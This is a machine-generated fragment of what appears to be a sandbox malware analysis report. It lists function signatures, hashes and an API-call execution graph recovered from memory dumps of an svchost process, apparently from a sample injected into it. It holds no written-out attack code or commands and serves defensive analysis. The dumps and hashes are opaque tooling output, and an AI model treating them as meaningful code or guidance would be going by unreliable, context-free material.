                                                • Instruction Fuzzy Hash: F6115422654F2105F66C91E4EE5D3AB10516F643F6E2C6625EA76076DE8B744F42C108
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001E.00000002.2929982709.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_30_2_25306e60000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                • String ID:
                                                • API String ID: 1092925422-0
                                                • Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                • Instruction ID: e00bab76806325a9abdd15b433a0a8b9cf25c5bc0eff83bbe6d02225dab48dd1
                                                • Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                • Instruction Fuzzy Hash: E3113035714F5082EB54DB51F91825A6760F744BC5F041029EE89477D8EF3DC608C708
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001E.00000002.2922053570.00000253067D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000253067D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_30_2_253067d0000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 3242871069-629598281
                                                • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                • Instruction ID: 67ee71b4855e026619fa8bc2fc696cfa62d67aa86e0da7ccef43094608b433d8
                                                • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                • Instruction Fuzzy Hash: 04518F32621B208ADB14CF15DC48B2D37A5F344FE9F51A9249A57877CEEB34DA81870A
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001E.00000002.2922053570.00000253067D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000253067D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_30_2_253067d0000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 3242871069-629598281
                                                • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                • Instruction ID: d7aab5b0b47cabe7f490b612553144fe0907bdc8f120940319c7e8d01024591c
                                                • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                • Instruction Fuzzy Hash: E0318D71211B6086E714DF15EC4872937A8F744FDAF15A414AE5B877CADB38CA80C70A
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001E.00000002.2929982709.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_30_2_25306e60000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$Free
                                                • String ID:
                                                • API String ID: 3168794593-0
                                                • Opcode ID: 5f7cef85691391bfd1f64b5ed8b2db0144129af346a3a3b2b5e725a5d1a6a2a2
                                                • Instruction ID: 5455172ac10750761f807d933ea8cf4a6234d30aeae94710e3f4c62fee7eac61
                                                • Opcode Fuzzy Hash: 5f7cef85691391bfd1f64b5ed8b2db0144129af346a3a3b2b5e725a5d1a6a2a2
                                                • Instruction Fuzzy Hash: C7119032514FA4D2E790CFA6AD0825A73B0F789FC6F045019EB8A03B99DF38C155C708
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001E.00000002.2929982709.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_30_2_25306e60000_svchost.jbxd
                                                Similarity
                                                • API ID: FileType
                                                • String ID: \\.\pipe\
                                                • API String ID: 3081899298-91387939
                                                • Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                • Instruction ID: c7236cf320714b2526d63330537b571de9eb5ebaef0cabde28b5695a523cc45a
                                                • Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                • Instruction Fuzzy Hash: 1371F332200FA14AE764DFA99E583EAA7A0F785BCAF442016EE4943BDDDE35C704C744
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001E.00000002.2929982709.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_30_2_25306e60000_svchost.jbxd
                                                Similarity
                                                • API ID: FileType
                                                • String ID: \\.\pipe\
                                                • API String ID: 3081899298-91387939
                                                • Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                • Instruction ID: 60bed6c58c811fc9480a51305fe544366d82a84ac1dbe4d575ecb31b521ad3ce
                                                • Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                • Instruction Fuzzy Hash: F351C632314FA146E674DEA9AA5C3AE6651F3857C1F056025EF8A03BDDCA35C705CB48
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001E.00000002.2929982709.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_30_2_25306e60000_svchost.jbxd
                                                Similarity
                                                • API ID: ErrorFileLastWrite
                                                • String ID: U
                                                • API String ID: 442123175-4171548499
                                                • Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                • Instruction ID: 7485eb8d491204f1ce11cca0cfad3f404e2594ac8933616b6f6e0bc89ec83e76
                                                • Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                • Instruction Fuzzy Hash: 7041C372324F9085EB60DFA5E9583AAA7A0F7887D5F405025EE4D87BC8EB3CC641CB44
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001E.00000002.2929982709.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_30_2_25306e60000_svchost.jbxd
                                                Similarity
                                                • API ID: Stringtry_get_function
                                                • String ID: LCMapStringEx
                                                • API String ID: 2588686239-3893581201
                                                • Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                • Instruction ID: 8af28ae692919d8603313224f70b36a1682288b8ea3ed641d4a538a4e1ae13c4
                                                • Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                • Instruction Fuzzy Hash: E3113836708B9086D760CB56B94429AB7A0F7C8BD0F545126EECD83B99DF38C550CB04
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001E.00000002.2929982709.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_30_2_25306e60000_svchost.jbxd
                                                Similarity
                                                • API ID: ExceptionFileHeaderRaise
                                                • String ID: csm
                                                • API String ID: 2573137834-1018135373
                                                • Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                • Instruction ID: b07f5f03d25d9b158e06b28a41cbf469893b1758ade9a3a89ddfd8545b5bd687
                                                • Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                • Instruction Fuzzy Hash: 1D114F32204F9082EB60CF15E94425AB7A0F788BD9F185220EF9D077A9DF38C651CB04
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001E.00000002.2929982709.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_30_2_25306e60000_svchost.jbxd
                                                Similarity
                                                • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                • String ID: InitializeCriticalSectionEx
                                                • API String ID: 539475747-3084827643
                                                • Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                • Instruction ID: 0d0f94fa5005d2db52ee7415070b774ec8ea19bb2dd30d10148e5c694d7103fb
                                                • Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                • Instruction Fuzzy Hash: 37F0E921310FA0D1E714DBC1FE0819A3360AB88BC1F486121FA5903BDCCF38C655DB08
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001E.00000002.2922053570.00000253067D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000253067D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_30_2_253067d0000_svchost.jbxd
                                                Similarity
                                                • API ID: try_get_function
                                                • String ID: November$October
                                                • API String ID: 2742660187-1636048786
                                                • Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                • Instruction ID: d80db938ff70edfacad32c38c6f4dd95aecdd62d6a497f35aa7aea60ab6189d6
                                                • Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                • Instruction Fuzzy Hash: 45E06511600F5591EE05D751FC483B822A59B88FC1F5974219615462DFCE38CAAAC208
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001E.00000002.2929982709.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_30_2_25306e60000_svchost.jbxd
                                                Similarity
                                                • API ID: Valuetry_get_function
                                                • String ID: FlsSetValue
                                                • API String ID: 738293619-3750699315
                                                • Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                • Instruction ID: 0510be533b4b701c4f3b3221e1973f29b97969593a1eb9b8a712a22ce5183e26
                                                • Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                • Instruction Fuzzy Hash: C3E06561310F50D1EB45DBD0FE0C69A2261AB887C2F88A122E619072DDCE38CA55DB08
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001E.00000002.2929982709.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_30_2_25306e60000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocFree
                                                • String ID:
                                                • API String ID: 756756679-0
                                                • Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                • Instruction ID: 7ab728e6ec886f2f157317706328fc7fc6e624865e902428bb9ec71c262b5bca
                                                • Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                • Instruction Fuzzy Hash: 2F219532604FA0C5EB52CF99E90829AF3A0FB84BD5F155110EE8C47B99EF78C646C704
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001E.00000002.2929982709.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_30_2_25306e60000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$AllocProcess
                                                • String ID:
                                                • API String ID: 1617791916-0
                                                • Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                • Instruction ID: 046ab16719213f55cb861d30c128802dd52e7fa93de647e3b09efeb0b4122294
                                                • Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                • Instruction Fuzzy Hash: 69E06571A11B10C6E748CFA2DC0834A37E1FB88F82F48D024C909073A8DF7D869ADB80

                                                Execution Graph

                                                Execution Coverage:1.1%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:0%
                                                Total number of Nodes:1521
                                                Total number of Limit Nodes:6
                                                execution_graph 7915 1845b3c2941 __scrt_dllmain_exception_filter 8319 1845b3b7bbc 8326 1845b3b9324 8319->8326 8322 1845b3b7bc9 8335 1845b3b9658 8326->8335 8329 1845b3baa94 8330 1845b3bb3a4 _set_errno_from_matherr 7 API calls 8329->8330 8331 1845b3b7bd2 8330->8331 8331->8322 8332 1845b3b9338 8331->8332 8345 1845b3b95ec 8332->8345 8334 1845b3b9343 8334->8322 8336 1845b3b7bc5 8335->8336 8338 1845b3b9677 try_get_function 8335->8338 8336->8322 8336->8329 8337 1845b3b96fc SetLastError 8337->8336 8338->8337 8339 1845b3b9a2c __vcrt_freeptd 4 API calls 8338->8339 8344 1845b3b969a __std_exception_copy 8338->8344 8340 1845b3b96aa 8339->8340 8340->8337 8341 1845b3b96d1 8340->8341 8343 1845b3b9a2c __vcrt_freeptd 4 API calls 8340->8343 8342 1845b3b9a2c __vcrt_freeptd 4 API calls 8341->8342 8341->8344 8342->8344 8343->8341 8344->8337 8346 1845b3b961a __std_exception_copy 8345->8346 8347 1845b3b9600 8345->8347 8346->8334 8348 1845b3b9a2c __vcrt_freeptd 4 API calls 8347->8348 8348->8346 7496 1845b3b3cc0 7499 1845b3b3c0d 7496->7499 7497 1845b3b3c5d VirtualQuery 7498 1845b3b3c77 7497->7498 7497->7499 7499->7497 7499->7498 7500 1845b3b3cc2 GetLastError 7499->7500 7500->7499 7916 1845b3b2b40 7918 1845b3b2b94 7916->7918 7917 1845b3b2baf 7918->7917 7920 1845b3b32fc 7918->7920 7921 1845b3b3392 7920->7921 7923 1845b3b3321 7920->7923 7921->7917 7922 1845b3b3930 StrCmpNIW 7922->7923 7923->7921 7923->7922 7924 1845b3b1e80 StrCmpIW StrCmpW 7923->7924 7924->7923 6814 1845b3b8036 6817 1845b3b93ec 6814->6817 6816 1845b3b8061 6818 1845b3b9442 __std_exception_copy 6817->6818 6819 1845b3b940d 6817->6819 6818->6816 6819->6818 6821 1845b3bab34 6819->6821 6822 1845b3bab4b 6821->6822 6823 1845b3bab41 6821->6823 6830 1845b3bb840 6822->6830 6823->6822 6825 1845b3bab66 6823->6825 6827 1845b3bab5e 6825->6827 6828 1845b3bb840 _set_errno_from_matherr 7 API calls 6825->6828 6827->6818 6829 1845b3bab52 6828->6829 6833 1845b3bb720 6829->6833 6836 1845b3bb3a4 6830->6836 6832 1845b3bb849 6832->6829 6999 1845b3bb670 6833->6999 6835 1845b3bb739 6835->6827 6837 1845b3bb3b9 try_get_function 6836->6837 6840 1845b3bb3d3 SetLastError 6837->6840 6857 1845b3bd608 6837->6857 6839 1845b3bb3ee 6839->6840 6862 1845b3bb860 6839->6862 6840->6832 6844 1845b3bb41f 6847 1845b3bd608 _set_errno_from_matherr 4 API calls 6844->6847 6845 1845b3bb40f 6846 1845b3bd608 _set_errno_from_matherr 4 API calls 6845->6846 6848 1845b3bb416 6846->6848 6849 1845b3bb427 6847->6849 6868 1845b3bb8d8 6848->6868 6850 1845b3bb43d 6849->6850 6851 1845b3bb42b 6849->6851 6873 1845b3baf94 6850->6873 6853 1845b3bd608 _set_errno_from_matherr 4 API calls 6851->6853 6853->6848 6856 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 6856->6840 6877 1845b3bd2cc 6857->6877 6859 1845b3bd636 6860 1845b3bd648 TlsSetValue 6859->6860 6861 1845b3bd640 6859->6861 6860->6861 6861->6839 6867 1845b3bb871 _set_errno_from_matherr 6862->6867 6863 1845b3bb8c2 6865 1845b3bb840 _set_errno_from_matherr 6 API calls 6863->6865 6864 1845b3bb8a6 HeapAlloc 6866 1845b3bb401 6864->6866 6864->6867 6865->6866 6866->6844 6866->6845 6867->6863 6867->6864 6869 1845b3bb8dd HeapFree 6868->6869 6870 1845b3bb90f 6868->6870 6869->6870 6871 1845b3bb8f8 6869->6871 6870->6840 6872 1845b3bb840 _set_errno_from_matherr 6 API calls 6871->6872 6872->6870 6874 1845b3bb046 _set_errno_from_matherr 6873->6874 6883 1845b3baeec 6874->6883 6876 1845b3bb05b 6876->6856 6879 1845b3bd328 try_get_function 6877->6879 6880 1845b3bd32d try_get_function 6877->6880 6878 1845b3bd35c LoadLibraryExW 6878->6879 6879->6878 6879->6880 6881 1845b3bd3f5 FreeLibrary 6879->6881 6882 1845b3bd3b7 LoadLibraryExW 6879->6882 6880->6859 6881->6879 6882->6879 6884 1845b3baf08 6883->6884 6887 1845b3bb17c 6884->6887 6886 1845b3baf1e 6886->6876 6888 1845b3bb1c4 Concurrency::details::SchedulerProxy::DeleteThis 6887->6888 6889 1845b3bb198 Concurrency::details::SchedulerProxy::DeleteThis 6887->6889 6888->6886 6889->6888 6891 1845b3be6e4 6889->6891 6892 1845b3be780 6891->6892 6896 1845b3be707 6891->6896 6893 1845b3be7d3 6892->6893 6895 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 6892->6895 6957 1845b3be884 6893->6957 6898 1845b3be7a4 6895->6898 6896->6892 6897 1845b3be746 6896->6897 6901 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 6896->6901 6900 1845b3be768 6897->6900 6906 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 6897->6906 6899 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 6898->6899 6902 1845b3be7b8 6899->6902 6903 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 6900->6903 6904 1845b3be73a 6901->6904 6905 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 6902->6905 6908 1845b3be774 6903->6908 6917 1845b3c0e98 6904->6917 6911 1845b3be7c7 6905->6911 6912 1845b3be75c 6906->6912 6907 1845b3be83e 6913 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 6908->6913 6909 1845b3be7df 6909->6907 6916 1845b3bb8d8 7 API calls Concurrency::details::SchedulerProxy::DeleteThis 6909->6916 6914 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 6911->6914 6945 1845b3c0fa4 6912->6945 6913->6892 6914->6893 6916->6909 6918 1845b3c0f9c 6917->6918 6919 1845b3c0ea1 6917->6919 6918->6897 6920 1845b3c0ebb 6919->6920 6921 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 6919->6921 6922 1845b3c0ecd 6920->6922 6924 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 6920->6924 6921->6920 6923 1845b3c0edf 6922->6923 6925 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 6922->6925 6926 1845b3c0ef1 6923->6926 6927 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 6923->6927 6924->6922 6925->6923 6928 1845b3c0f03 6926->6928 6929 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 6926->6929 6927->6926 6930 1845b3c0f15 6928->6930 6931 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 6928->6931 6929->6928 6932 1845b3c0f27 6930->6932 6934 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 6930->6934 6931->6930 6933 1845b3c0f39 6932->6933 6935 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 6932->6935 6936 1845b3c0f4b 6933->6936 6937 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 6933->6937 6934->6932 6935->6933 6938 1845b3c0f5d 6936->6938 6939 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 6936->6939 6937->6936 6940 1845b3c0f72 6938->6940 6941 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 6938->6941 6939->6938 6942 1845b3c0f87 6940->6942 6943 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 6940->6943 6941->6940 6942->6918 6944 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 6942->6944 6943->6942 6944->6918 6946 1845b3c100a 6945->6946 6947 1845b3c0fa9 6945->6947 6946->6900 6948 1845b3c0fc2 6947->6948 6949 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 6947->6949 6950 1845b3c0fd4 6948->6950 6951 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 6948->6951 6949->6948 6952 1845b3c0fe6 6950->6952 6954 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 6950->6954 6951->6950 6953 1845b3c0ff8 6952->6953 6955 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 6952->6955 6953->6946 6956 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 6953->6956 6954->6952 6955->6953 6956->6946 6958 1845b3be8b4 6957->6958 6959 1845b3be889 6957->6959 6958->6909 6959->6958 6963 1845b3c1068 6959->6963 6962 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 6962->6958 6964 1845b3c1071 6963->6964 6965 1845b3be8ac 6963->6965 6966 1845b3c1010 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 6964->6966 6965->6962 6967 1845b3c108f 6966->6967 6968 1845b3c1010 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 6967->6968 6969 1845b3c109a 6968->6969 6970 1845b3c1010 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 6969->6970 6971 1845b3c10a8 6970->6971 6972 1845b3c1010 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 6971->6972 6973 1845b3c10b6 6972->6973 6974 1845b3c1010 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 6973->6974 6975 1845b3c10c5 6974->6975 6976 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 6975->6976 6977 1845b3c10d1 6976->6977 6978 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 6977->6978 6979 1845b3c10dd 6978->6979 6980 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 6979->6980 6981 1845b3c10e9 6980->6981 6982 1845b3c1010 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 6981->6982 6983 1845b3c10f7 6982->6983 6984 1845b3c1010 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 6983->6984 6985 1845b3c1105 6984->6985 6986 1845b3c1010 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 6985->6986 6987 1845b3c1113 6986->6987 6988 1845b3c1010 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 6987->6988 6989 1845b3c1121 6988->6989 6990 1845b3c1010 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 6989->6990 6991 1845b3c1130 6990->6991 6992 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 6991->6992 6993 1845b3c113c 6992->6993 6994 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 6993->6994 6995 1845b3c1148 6994->6995 6996 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 6995->6996 6997 1845b3c1154 6996->6997 6998 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 6997->6998 6998->6965 7000 1845b3bb3a4 _set_errno_from_matherr 7 API calls 6999->7000 7001 1845b3bb695 7000->7001 7002 1845b3bb6a6 7001->7002 7003 1845b3bb670 _invalid_parameter_noinfo 7 API calls 7001->7003 7002->6835 7004 1845b3bb739 7003->7004 7004->6835 7501 1845b3b14b4 7502 1845b3b14d1 GetProcessHeap HeapFree 7501->7502 7503 1845b3b14f0 GetProcessHeap HeapFree 7501->7503 7502->7502 7502->7503 7504 1845b3b150f 7503->7504 7504->7504 7505 1845b3b152a GetProcessHeap HeapFree 7504->7505 7506 1845b3c3180 7505->7506 8349 1845b3b29b4 8351 1845b3b29f9 8349->8351 8350 1845b3b2a5c 8351->8350 8352 1845b3b3930 StrCmpNIW 8351->8352 8352->8351 7005 1845b3bd234 7006 1845b3bd256 7005->7006 7009 1845b3bd273 7005->7009 7007 1845b3bd264 7006->7007 7006->7009 7008 1845b3bb840 _set_errno_from_matherr 7 API calls 7007->7008 7011 1845b3bd269 7008->7011 7012 1845b3bf988 7009->7012 7013 1845b3bf99d 7012->7013 7014 1845b3bf9a7 7012->7014 7023 1845b3bae0c 7013->7023 7016 1845b3bf9ac 7014->7016 7022 1845b3bf9b3 _set_errno_from_matherr 7014->7022 7017 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 7016->7017 7020 1845b3bf9a5 7017->7020 7018 1845b3bf9b9 7021 1845b3bb840 _set_errno_from_matherr 7 API calls 7018->7021 7019 1845b3bf9e6 HeapReAlloc 7019->7020 7019->7022 7020->7011 7021->7020 7022->7018 7022->7019 7024 1845b3bae57 7023->7024 7028 1845b3bae1b _set_errno_from_matherr 7023->7028 7025 1845b3bb840 _set_errno_from_matherr 7 API calls 7024->7025 7027 1845b3bae55 7025->7027 7026 1845b3bae3e HeapAlloc 7026->7027 7026->7028 7027->7020 7028->7024 7028->7026 7925 1845b3bf934 7928 1845b3bcc38 7925->7928 7929 1845b3bcc8a 7928->7929 7930 1845b3bcc45 7928->7930 7934 1845b3bb2fc 7930->7934 7937 1845b3bb30d 7934->7937 7935 1845b3bd608 _set_errno_from_matherr 4 API calls 7936 1845b3bb331 7935->7936 7938 1845b3bb860 _set_errno_from_matherr 7 API calls 7936->7938 7940 1845b3bb31a 7936->7940 7937->7935 7937->7940 7941 1845b3bb344 7938->7941 7939 1845b3bab94 19 API calls 7942 1845b3bb3a2 7939->7942 7940->7939 7945 1845b3bb394 7940->7945 7943 1845b3bb362 7941->7943 7944 1845b3bb352 7941->7944 7947 1845b3bd608 _set_errno_from_matherr 4 API calls 7943->7947 7946 1845b3bd608 _set_errno_from_matherr 4 API calls 7944->7946 7957 1845b3bc9c0 7945->7957 7955 1845b3bb359 7946->7955 7948 1845b3bb36a 7947->7948 7949 1845b3bb36e 7948->7949 7950 1845b3bb380 7948->7950 7953 1845b3bd608 _set_errno_from_matherr 4 API calls 7949->7953 7951 1845b3baf94 _set_errno_from_matherr 7 API calls 7950->7951 7954 1845b3bb388 7951->7954 7952 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 7952->7940 7953->7955 7956 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 7954->7956 7955->7952 7956->7940 7975 1845b3bcb80 7957->7975 7959 1845b3bc9e9 7986 1845b3bc6cc 7959->7986 7962 1845b3bca03 7962->7929 7963 1845b3bae0c 8 API calls 7965 1845b3bca14 7963->7965 7964 1845b3bcaaf 7966 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 7964->7966 7965->7964 7993 1845b3bccb4 7965->7993 7966->7962 7969 1845b3bcaaa 7970 1845b3bb840 _set_errno_from_matherr 7 API calls 7969->7970 7970->7964 7971 1845b3bcb0c 7971->7964 8004 1845b3bc510 7971->8004 7972 1845b3bcacf 7972->7971 7973 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 7972->7973 7973->7971 7980 1845b3bcba3 7975->7980 7976 1845b3bcc1f 7976->7959 7977 1845b3bcbad 7977->7976 7978 1845b3bab94 19 API calls 7977->7978 7979 1845b3bcc37 7978->7979 7981 1845b3bcc8a 7979->7981 7983 1845b3bb2fc 19 API calls 7979->7983 7980->7977 7982 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 7980->7982 7981->7959 7982->7977 7984 1845b3bcc74 7983->7984 7985 1845b3bc9c0 27 API calls 7984->7985 7985->7981 7987 1845b3babec 19 API calls 7986->7987 7988 1845b3bc6e0 7987->7988 7989 1845b3bc6fe 7988->7989 7990 1845b3bc6ec GetOEMCP 7988->7990 7991 1845b3bc713 7989->7991 7992 1845b3bc703 GetACP 7989->7992 7990->7991 7991->7962 7991->7963 7992->7991 7994 1845b3bc6cc 21 API calls 7993->7994 7995 1845b3bccdf 7994->7995 7997 1845b3bcd1c IsValidCodePage 7995->7997 8002 1845b3bcd5f 7995->8002 7996 1845b3b7a20 _handle_error 4 API calls 7998 1845b3bcaa3 7996->7998 7999 1845b3bcd2d 7997->7999 7997->8002 7998->7969 7998->7972 8000 1845b3bcd64 GetCPInfo 7999->8000 8003 1845b3bcd36 7999->8003 8000->8002 8000->8003 8002->7996 8016 1845b3bc7dc 8003->8016 8006 1845b3bc52c 8004->8006 8005 1845b3bc54f 8010 1845b3bb840 _set_errno_from_matherr 7 API calls 8005->8010 8014 1845b3bc5f7 8005->8014 8006->8005 8007 1845b3bb840 _set_errno_from_matherr 7 API calls 8006->8007 8008 1845b3bc5be 8007->8008 8009 1845b3bb720 _invalid_parameter_noinfo 7 API calls 8008->8009 